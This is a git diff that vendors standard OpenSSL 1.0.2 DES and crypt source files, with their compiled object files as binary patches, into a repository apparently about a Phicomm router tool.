+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.c
@@ -0,0 +1,177 @@
+/* crypto/des/enc_writ.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <errno.h>
+#include <time.h>
+#include <stdio.h>
+#include "cryptlib.h"
+#include "des_locl.h"
+#include <openssl/rand.h>
+
+/*-
+ * WARNINGS:
+ *
+ *  -  The data format used by DES_enc_write() and DES_enc_read()
+ *     has a cryptographic weakness: When asked to write more
+ *     than MAXWRITE bytes, DES_enc_write will split the data
+ *     into several chunks that are all encrypted
+ *     using the same IV.  So don't use these functions unless you
+ *     are sure you know what you do (in which case you might
+ *     not want to use them anyway).
+ *
+ *  -  This code cannot handle non-blocking sockets.
+ */
+
+int DES_enc_write(int fd, const void *_buf, int len,
+                  DES_key_schedule *sched, DES_cblock *iv)
+{
+#if defined(OPENSSL_NO_POSIX_IO)
+    return (-1);
+#else
+# ifdef _LIBC
+    extern unsigned long time();
+    extern int write();
+# endif
+    const unsigned char *buf = _buf;
+    long rnum;
+    int i, j, k, outnum;
+    static unsigned char *outbuf = NULL;
+    unsigned char shortbuf[8];
+    unsigned char *p;
+    const unsigned char *cp;
+    static int start = 1;
+
+    if (outbuf == NULL) {
+        outbuf = OPENSSL_malloc(BSIZE + HDRSIZE);
+        if (outbuf == NULL)
+            return (-1);
+    }
+    /*
+     * If we are sending less than 8 bytes, the same char will look the same
+     * if we don't pad it out with random bytes
+     */
+    if (start) {
+        start = 0;
+    }
+
+    /* lets recurse if we want to send the data in small chunks */
+    if (len > MAXWRITE) {
+        j = 0;
+        for (i = 0; i < len; i += k) {
+            k = DES_enc_write(fd, &(buf[i]),
+                              ((len - i) > MAXWRITE) ? MAXWRITE : (len - i),
+                              sched, iv);
+            if (k < 0)
+                return (k);
+            else
+                j += k;
+        }
+        return (j);
+    }
+
+    /* write length first */
+    p = outbuf;
+    l2n(len, p);
+
+    /* pad short strings */
+    if (len < 8) {
+        cp = shortbuf;
+        memcpy(shortbuf, buf, len);
+        RAND_pseudo_bytes(shortbuf + len, 8 - len);
+        rnum = 8;
+    } else {
+        cp = buf;
+        rnum = ((len + 7) / 8 * 8); /* round up to nearest eight */
+    }
+
+    if (DES_rw_mode & DES_PCBC_MODE)
+        DES_pcbc_encrypt(cp, &(outbuf[HDRSIZE]), (len < 8) ? 8 : len, sched,
+                         iv, DES_ENCRYPT);
+    else
+        DES_cbc_encrypt(cp, &(outbuf[HDRSIZE]), (len < 8) ? 8 : len, sched,
+                        iv, DES_ENCRYPT);
+
+    /* output */
+    outnum = rnum + HDRSIZE;
+
+    for (j = 0; j < outnum; j += i) {
+        /*
+         * eay 26/08/92 I was not doing writing from where we got up to.
+         */
+# ifndef _WIN32
+        i = write(fd, (void *)&(outbuf[j]), outnum - j);
+# else
+        i = _write(fd, (void *)&(outbuf[j]), outnum - j);
+# endif
+        if (i == -1) {
+# ifdef EINTR
+            if (errno == EINTR)
+                i = 0;
+            else
+# endif
+                /*
+                 * This is really a bad error - very bad It will stuff-up
+                 * both ends.
+                 */
+                return (-1);
+        }
+    }
+
+    return (len);
+#endif                          /* OPENSSL_NO_POSIX_IO */
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.o
new file mode 100644
index 0000000000000000000000000000000000000000..085f64c078909c8fbb92a5f5e2d6d706273e4fd4
GIT binary patch
literal 2920
zcmbuAU1%It6oBt!H{I2yvukT55Rrve*`OVEQxlVdW$$J;nZTwg`BAFY>1KA~#%6z<
zoh6MzV_6~&G5);uRq)vd@j;82V1rhwFO{MM5vdUy(^jQcOCw#+xjVPHneO6)2kzW+
zzd7gJbART{Y%<l?BuRveL=KY85vPP)_HF7hrpAa&c983Vhi=iQ=~L9cO~(f8uj%NR
zYTp=9^%b>pC7e;`y$^@MT(uK>Tcb;A<w@pi?dA&oqL~qRtaqNtK)2|R5t0IXzq-(g
z?=IsbHIHC!Nwt}Md68DWs;;#`s;4$cjF6LRGP+6^QMFeF^gmPfTEhN2(SC_VI&}+Q
z(7@2Qs&tLTn_CLJz5;Qnw9G;$dVZSyeC<3Cb$&NIiTz#RoZVE}@Xbb33z@w^)xM_c
z=UKFr{Y%RJnSSC2v+M7Die38;n^~@JPb}y@T3Nk0sIRK?EZ@q8A2L$y-_D>l{TR1c
z4GeyxE)>0gF$>A^u@LLctfQ4>Z}e)yzNG3mU?Hl9ZAJU9s(yjJw?C^cm4i&JbbAAH
zS8rFV(F@W=+H+<0OKN|=?xFUw3Y*rNQTNx*z^X-7E6d@8{o}Jo>2vfbeV%G(F&QJT
zYt!bWrRaq8_x2tLg~!Ird8-`iQT8j5ebFb%Y#2S+5m6$Kx7RTEd7%ZN;Trl6jgclo
zmXLX%q1<2Vi1hL>kxm4qwiciNZJ00x{6Xj4GA7U`2j6On%dKyEl5%Llo0P+EG*db9
z+O~w;UGeqH$2_McxjP|8s2q;VA+U_g!MN;qVl?V7w3qx*t@qwj_oid+Jo~L)9=6)8
z3`ZWe`mMYLhLT{<^K4~&Gd}JW7Y`9WG7h2l5biBN#_!n*V6=x3cBAfk=ONqfVqqXV
zg?(UW0jvueo~v8%-0JaX8t|zG{M82hod!J8fWO;-f6#!77rjun#>*2*XIFOzDOqXL
zLbZ!1son@lBu6y<O&CP$PYuOsN*n6y8%d68qcomMYNU7g$l=i;Etj5}D(GaG9!hA%
zl2OhSwDB3sC=socO=k+z8pblGwOk=%u((BiT*u(%OwnRM9BZ0kn)!kTA=B1mAx|_7
za?_7%diJ<Bk)Fg21&P)={NC6t+o;y$fWYyVao+3VHywLT;M+m}$KhCsQSg2SpmAP8
z2*T&({KFb%_B%l5{G!9%_V?n434-zQK5_d!4tLup1%4mc^K}ghadrxEMg_i0;4cbs
zaBe=YCD>!l;(S)%_+Q}seStq9@DS)Im_N2VqLgNGR(hN$CCjY!S+1GJR9dl&6Bbc2
zX)8^X@luH>W&sCi9#x`5(F?hpkq47}!7>ymwfoq$aK<m>%SzEK6b;jw0apxYWVH!1
zoipxa@V}H0c;k}Y6(j}>h1ZSRsAkJ`?AxH>e#fAR@{v=jPCNUFcMw%x@vvT^JOT~*
zX5~Z*F`Z4u*rK?{kHJff>Gt<K{(L?j!#&3D4d?IR22RiYF>g_v<uD)QF=)uJj)}6%
zng3A{g6{So5SVCs(D4@;>fE36BcR~l#cdvQK!_VUy?gyH0mqnb|6>lw{)a!7t$OEw
z*!ku0bH;tdzZ##P^LlgRl;@oJ!%p7<4C{~EA7i@D9uWE6xhQ9GAc%Yau;$eB&pP?P
KBKV@}_Wu_bFUFMs

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.c
new file mode 100644
index 0000000..111f1e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.c
@@ -0,0 +1,167 @@
+/* NOCW */
+#include <stdio.h>
+#ifdef _OSD_POSIX
+# ifndef CHARSET_EBCDIC
+#  define CHARSET_EBCDIC 1
+# endif
+#endif
+#ifdef CHARSET_EBCDIC
+# include <openssl/ebcdic.h>
+#endif
+
+/*
+ * This version of crypt has been developed from my MIT compatible DES
+ * library. Eric Young (eay@cryptsoft.com)
+ */
+
+/*
+ * Modification by Jens Kupferschmidt (Cu) I have included directive PARA for
+ * shared memory computers. I have included a directive LONGCRYPT to using
+ * this routine to cipher passwords with more then 8 bytes like HP-UX 10.x it
+ * used. The MAXPLEN definition is the maximum of length of password and can
+ * changed. I have defined 24.
+ */
+
+#include "des_locl.h"
+
+/*
+ * Added more values to handle illegal salt values the way normal crypt()
+ * implementations do.  The patch was sent by Bjorn Gronvall <bg@sics.se>
+ */
+static unsigned const char con_salt[128] = {
+    0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9,
+    0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1,
+    0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9,
+    0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1,
+    0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9,
+    0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF, 0x00, 0x01,
+    0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
+    0x0A, 0x0B, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A,
+    0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12,
+    0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A,
+    0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22,
+    0x23, 0x24, 0x25, 0x20, 0x21, 0x22, 0x23, 0x24,
+    0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C,
+    0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34,
+    0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C,
+    0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44,
+};
+
+static unsigned const char cov_2char[64] = {
+    0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35,
+    0x36, 0x37, 0x38, 0x39, 0x41, 0x42, 0x43, 0x44,
+    0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,
+    0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54,
+    0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62,
+    0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A,
+    0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72,
+    0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A
+};
+
+char *DES_crypt(const char *buf, const char *salt)
+{
+    static char buff[14];
+
+#ifndef CHARSET_EBCDIC
+    return (DES_fcrypt(buf, salt, buff));
+#else
+    char e_salt[2 + 1];
+    char e_buf[32 + 1];         /* replace 32 by 8 ? */
+    char *ret;
+
+    /* Copy at most 2 chars of salt */
+    if ((e_salt[0] = salt[0]) != '\0')
+        e_salt[1] = salt[1];
+
+    /* Copy at most 32 chars of password */
+    strncpy(e_buf, buf, sizeof(e_buf));
+
+    /* Make sure we have a delimiter */
+    e_salt[sizeof(e_salt) - 1] = e_buf[sizeof(e_buf) - 1] = '\0';
+
+    /* Convert the e_salt to ASCII, as that's what DES_fcrypt works on */
+    ebcdic2ascii(e_salt, e_salt, sizeof e_salt);
+
+    /* Convert the cleartext password to ASCII */
+    ebcdic2ascii(e_buf, e_buf, sizeof e_buf);
+
+    /* Encrypt it (from/to ASCII) */
+    ret = DES_fcrypt(e_buf, e_salt, buff);
+
+    /* Convert the result back to EBCDIC */
+    ascii2ebcdic(ret, ret, strlen(ret));
+
+    return ret;
+#endif
+}
+
+char *DES_fcrypt(const char *buf, const char *salt, char *ret)
+{
+    unsigned int i, j, x, y;
+    DES_LONG Eswap0, Eswap1;
+    DES_LONG out[2], ll;
+    DES_cblock key;
+    DES_key_schedule ks;
+    unsigned char bb[9];
+    unsigned char *b = bb;
+    unsigned char c, u;
+
+    /*
+     * eay 25/08/92 If you call crypt("pwd","*") as often happens when you
+     * have * as the pwd field in /etc/passwd, the function returns
+     * *\0XXXXXXXXX The \0 makes the string look like * so the pwd "*" would
+     * crypt to "*".  This was found when replacing the crypt in our shared
+     * libraries.  People found that the disabled accounts effectively had no
+     * passwd :-(.
+     */
+#ifndef CHARSET_EBCDIC
+    x = ret[0] = ((salt[0] == '\0') ? 'A' : salt[0]);
+    Eswap0 = con_salt[x] << 2;
+    x = ret[1] = ((salt[1] == '\0') ? 'A' : salt[1]);
+    Eswap1 = con_salt[x] << 6;
+#else
+    x = ret[0] = ((salt[0] == '\0') ? os_toascii['A'] : salt[0]);
+    Eswap0 = con_salt[x] << 2;
+    x = ret[1] = ((salt[1] == '\0') ? os_toascii['A'] : salt[1]);
+    Eswap1 = con_salt[x] << 6;
+#endif
+
+    /*
+     * EAY r=strlen(buf); r=(r+7)/8;
+     */
+    for (i = 0; i < 8; i++) {
+        c = *(buf++);
+        if (!c)
+            break;
+        key[i] = (c << 1);
+    }
+    for (; i < 8; i++)
+        key[i] = 0;
+
+    DES_set_key_unchecked(&key, &ks);
+    fcrypt_body(&(out[0]), &ks, Eswap0, Eswap1);
+
+    ll = out[0];
+    l2c(ll, b);
+    ll = out[1];
+    l2c(ll, b);
+    y = 0;
+    u = 0x80;
+    bb[8] = 0;
+    for (i = 2; i < 13; i++) {
+        c = 0;
+        for (j = 0; j < 6; j++) {
+            c <<= 1;
+            if (bb[y] & u)
+                c |= 1;
+            u >>= 1;
+            if (!u) {
+                y++;
+                u = 0x80;
+            }
+        }
+        ret[i] = cov_2char[c];
+    }
+    ret[13] = '\0';
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.o
new file mode 100644
index 0000000000000000000000000000000000000000..f722c0a89bac562539d4b83dbf0ae2928b33b565
GIT binary patch
literal 2592
zcmbtWTX0iV6g@XdUyvpNic||2H9(N|+O&mIM959k_M(w$A6T8jHBSO<lbYN>gN~MI
zbVzHQemJ9lGUJDQA|H(YFu_OR%W)9j4=M^mi)h6Mtw`KE_ndIer265WIoW%!{W@pw
zd(Py!7FVl=;|L>;Y$3Nah7xkP_?B$Xigsck<>Z=i<(#lX=oY%RCC_$?2d}&ZMxQvQ
zTV(}7OeQQxfZNie#ffxGb5sxx=`3QZ95WbCq@Bj&)!b++C!D;XVRom51B>kp*c!la
zv3OLs%#})5UV)HATJGi2hY}U2h?#f9k-5^?IWg65sc<DviOH*%FtM0=#-ev7XPn8Y
z95m*%=#LHCG7|~Q8|d@427X+rB9w8LuK}MHM&?TPzbQ=UOqhInMo7+bX-DE^Jz8b$
z$Z77wshBQv>ez7RgV=fF@w70iBXA<Um^mqq%$Cb#C$LSn^z{3}gws+^#4+XkKCxbD
zh+L%X@ZfvcCs%TEr_d|x6n4FfeH2qm0VJ1?+{|Q9K;rMKwbj)(tl!YMu}N?=J6l@Y
z#BC2g<a&5}`y-Ebbar*`c&z8~C)^&d&mY(w+_Sf@e;^bdd@2%^WBc|G#SfhM=<LUz
zeEQkvUwrx1*Wa9*{Pz5J-(R@+!==kp(^r1H`qR%dzg+wEx8MJ`K0Ej4jlXVY2&d8N
zii%50%N8u8OkZv=niefyQnB>5WtF$zQMG)<$~(<>-F=T`mGZlKjdkt4>#A$i8{KsO
z<_ETHwc~zCTXXX!v$fk33&}Ba6JO8Q*4P?jS=IJzT`gbRuvUSU^Xh<^VBuiews#X4
zQyMWXETjsB5$-?-;f73HmA<5O96s2MfG?*u5kKHogXtxW!%&&hIt=C)bxwozg`zgY
zB&W4<2CLIx29v{Jau`aLdOb82YyTTzY8{!$%}4F4EqHTq?`-#KZ^ZFr|D*+=a&US(
zg@-9$0vvHhb}Fm@&Z+Vkm;-RF%3lQoUZPfWvX($I3XqnR6+kh+>QSH`Yk)6S^&vY8
z!0KQX>a92rzH1(Q?>zX^fMZ=&FIOwzjl>6K-b=jUkQ8<I%OLEN>byaBgm_|s0N=2o
zX+3eabV`aRk=k7C4#6e0x3+e+bV*%;!_^{X9io0&>hs5?SjZdnd;9!8qJ&7EurE#|
zDJr|YeUdlWCk5Pl`m-U~;;=Q+h(AF1>|mESqXIOpu<QhlAm7L+^tuYivoJhOah8YS
zb@b83FKUs>zn$Xfk2dCS1{n!)T#S0Dz;M=2!bjr+vfBe(jwn3Hq=>)Y&CC8FneaZh
z>?XV?8YO%rtSH{_z<@slwoq91^KhqYvVEfZ?of;$jD!dM5jhSqn8_cM0ulFspKa-X
zaWh0?3-Z5IJ77pXv_Fcb_%a!J6)fzV9hRDc^eVFXEd(Q`VmGLgI<Ka9{tNJGUR~<0
zx;Y9`4GeS67q7nW7{ThJjAVm_rPMP<{4lMbMny$tm5gE&EOf0!MMY22gzHooitJd7
zJ5-q3bu52F)X3tPZwCnYTIIWsQ^3p|DbGJYz89D?KmI5Mg8vbZUtyv7U#IhDeZl$T
zE6M7!`4_5<B`fJbPtybI0mFYq`SF-DfA#>8N!%3B^9sxT=JyZZf<p0DdLiUoq$1?U
F{|(7`b!`9u

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.c
new file mode 100644
index 0000000..b9e8738
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.c
@@ -0,0 +1,140 @@
+/* crypto/des/fcrypt_b.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+
+/*
+ * This version of crypt has been developed from my MIT compatible DES
+ * library. The library is available at pub/Crypto/DES at ftp.psy.uq.oz.au
+ * Eric Young (eay@cryptsoft.com)
+ */
+
+#define DES_FCRYPT
+#include "des_locl.h"
+#undef DES_FCRYPT
+
+#undef PERM_OP
+#define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
+        (b)^=(t),\
+        (a)^=((t)<<(n)))
+
+#undef HPERM_OP
+#define HPERM_OP(a,t,n,m) ((t)=((((a)<<(16-(n)))^(a))&(m)),\
+        (a)=(a)^(t)^(t>>(16-(n))))\
+
+void fcrypt_body(DES_LONG *out, DES_key_schedule *ks, DES_LONG Eswap0,
+                 DES_LONG Eswap1)
+{
+    register DES_LONG l, r, t, u;
+#ifdef DES_PTR
+    register const unsigned char *des_SP = (const unsigned char *)DES_SPtrans;
+#endif
+    register DES_LONG *s;
+    register int j;
+    register DES_LONG E0, E1;
+
+    l = 0;
+    r = 0;
+
+    s = (DES_LONG *)ks;
+    E0 = Eswap0;
+    E1 = Eswap1;
+
+    for (j = 0; j < 25; j++) {
+#ifndef DES_UNROLL
+        register int i;
+
+        for (i = 0; i < 32; i += 4) {
+            D_ENCRYPT(l, r, i + 0); /* 1 */
+            D_ENCRYPT(r, l, i + 2); /* 2 */
+        }
+#else
+        D_ENCRYPT(l, r, 0);     /* 1 */
+        D_ENCRYPT(r, l, 2);     /* 2 */
+        D_ENCRYPT(l, r, 4);     /* 3 */
+        D_ENCRYPT(r, l, 6);     /* 4 */
+        D_ENCRYPT(l, r, 8);     /* 5 */
+        D_ENCRYPT(r, l, 10);    /* 6 */
+        D_ENCRYPT(l, r, 12);    /* 7 */
+        D_ENCRYPT(r, l, 14);    /* 8 */
+        D_ENCRYPT(l, r, 16);    /* 9 */
+        D_ENCRYPT(r, l, 18);    /* 10 */
+        D_ENCRYPT(l, r, 20);    /* 11 */
+        D_ENCRYPT(r, l, 22);    /* 12 */
+        D_ENCRYPT(l, r, 24);    /* 13 */
+        D_ENCRYPT(r, l, 26);    /* 14 */
+        D_ENCRYPT(l, r, 28);    /* 15 */
+        D_ENCRYPT(r, l, 30);    /* 16 */
+#endif
+
+        t = l;
+        l = r;
+        r = t;
+    }
+    l = ROTATE(l, 3) & 0xffffffffL;
+    r = ROTATE(r, 3) & 0xffffffffL;
+
+    PERM_OP(l, r, t, 1, 0x55555555L);
+    PERM_OP(r, l, t, 8, 0x00ff00ffL);
+    PERM_OP(l, r, t, 2, 0x33333333L);
+    PERM_OP(r, l, t, 16, 0x0000ffffL);
+    PERM_OP(l, r, t, 4, 0x0f0f0f0fL);
+
+    out[0] = r;
+    out[1] = l;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.o
new file mode 100644
index 0000000000000000000000000000000000000000..f34572a857dc9890f671114f75a755e05e7ba2c7
GIT binary patch
literal 5072
zcmd5<U1$_n6u!x>np)j#g9WQnb|JKu>XPXOv{IT}GczegTB*hss>Z~`3QeLU8_*(c
zByHhxYwLprAAHC|9`fKr9s*6lhm2K|f~{#$^uf{)k{CjaDdvxon11KZoyla~NNZd1
z!g6NL+&lMt=R0%Hx1U)%?Ch*8=8Y`&CR@1kyo{ZWE?gI@%VM^gtz!3cU;LB5&%b{G
zz8$BQ(G$Lhm+{?}F;KQk+EJO1`@^Q(pJU2BtAv?<TH0%1&PaPL%vot~fH^1a7)*<_
z^I=-0y%DBO+M8g`OS=H3UD|~(9n#(k(<$vYU@l0z7^X|wCd?&izXj7H?Hw>zrM(lT
zSK7N_u1os^m|N1`3v*lA2VnZ7T?I2B?ZYs`(yoCSmG)7XacQSuCZv4~W=7g4j452q
znxc=3n_S#=hNG4-Xc~Py-W~6;!~@Hi<KlPj48ecLGRC;LY#KA%8H`$Dnj4o*G0vTP
zE1ltN-h8KsJ3ob+`-->>H<ctm?_}AG(KKf)50lpM=Ak0xUd|Y7I}6ieyz(YytW%y9
zuE!a}>(u0SB910Gckzy~mA*R!PMQbleQgX3S>iWiTwFm!&REpA!sFBNpWW~+di_w8
z8{I1WNz-`Xhd*hGDT)mHl_py|83H2+hzPq|$^3Tpd@N6Itemaw1Pjys_$heV(asiv
zH;o|*)Doj5Njv}q?u@Qf7@7x)+_*bh7%-T!D*rSlDG(gd7!!brXs4|BGzSJ_))I53
zJduA!MQsdnW7-m!Gyp~(SmK^#OsM=IzkuQ8mpfMphMTT%`=SgEA_ARUAW<1qObjAG
zqM^-2Lbsqn=UCAI*C=SX3mQBam<<?M)j~9IafJ|_buoaBOX)Dq`7pX438O=^5r9#c
z83q!pU?7J<7`Ro01Yp3m6bw94Fu;m}F-0(1G!-Bv9Y(7U<8j#t)H1?%YeVNc2;)Cs
zqitz6&igPP#Re4<YSd-KE2<~XM*Griboekbvw`D;z6Vr2eeK>iQj&c5!|>4Ibo!sZ
zjn1XnxZuNh6dOJh!B6~&v(fbs8)6QJ6`fR<Gz|TH(}DHWo>V=W4gGzKIf|W*Ef>mF
zbVGt+bT572J`E>TuV#Z_po0Ya#&y4_GJhLSN#D3+%9{LJ=r5Fgv~eqbhsTlrIdpL<
zs@tvx8KXWfaHd0mP-{eKDS}8|IHPEP9viBQQ=2MD7PhELBoTrpOoxDS<EVH0#-c_}
z{aQD2F=3MM7|UL0|Eld%525x?5`<(4S|t3cgA<58Qw*VnD;+iD3K1X0fJOl^#l<9{
zfE-auDj-F?^JzhfaGX>RNfAyG$~~kOBY=BBil8BjVYlDAO2ipfLWE=*0_Vw&Cf)gb
z0K;M&I*=Qa#<(j3{qRS95~d*p-SB6ELU0{~V7ij(BPG?Ogd&s_b_WC49Vu+0@E=lA
ze)y1~P*6mGB2J~+B~PmorL2_na3zQqQL2<6OP4Aoh$oV>|D=>M)e)7JTSI<&wV+jM
zc8NODC{z`yx=|oZnaZE>ipnb{E^b%?qI(EU3-R8u;&VKH4K-;QleAz~$=XRwFvSA}
z312u+P5Wi5BsX`ig;lLU-Qo##JruO+g>LbBg@m^tnOa57QPD#WVxDrUio)r5kMy4_
z_5;#Ty}~7-lLQo$`23H#U$owzpLcpfXuhEj_lb+YjF?9M$^J47Zd^ZAm}iQ9W84|Z
zF)p6$pJ(&T=ym#Y@JL(~SDcY-H9Ltxv%}xg|1iBGYFy0y?pK<QI>mHnB&;UqV!+|_
zhmBrSyv+BC(lFo0_w(`}SZPVgw%Eq9%Er1>W9;=rGEuPE*wUzOjZa@INE8&l;<`yj
zGWu%>AguJAGOE%p@&TY4YqZV!<UN*kESj}`)ry?cI2BCzH|S?KR^!5sM8C;?H?sEY
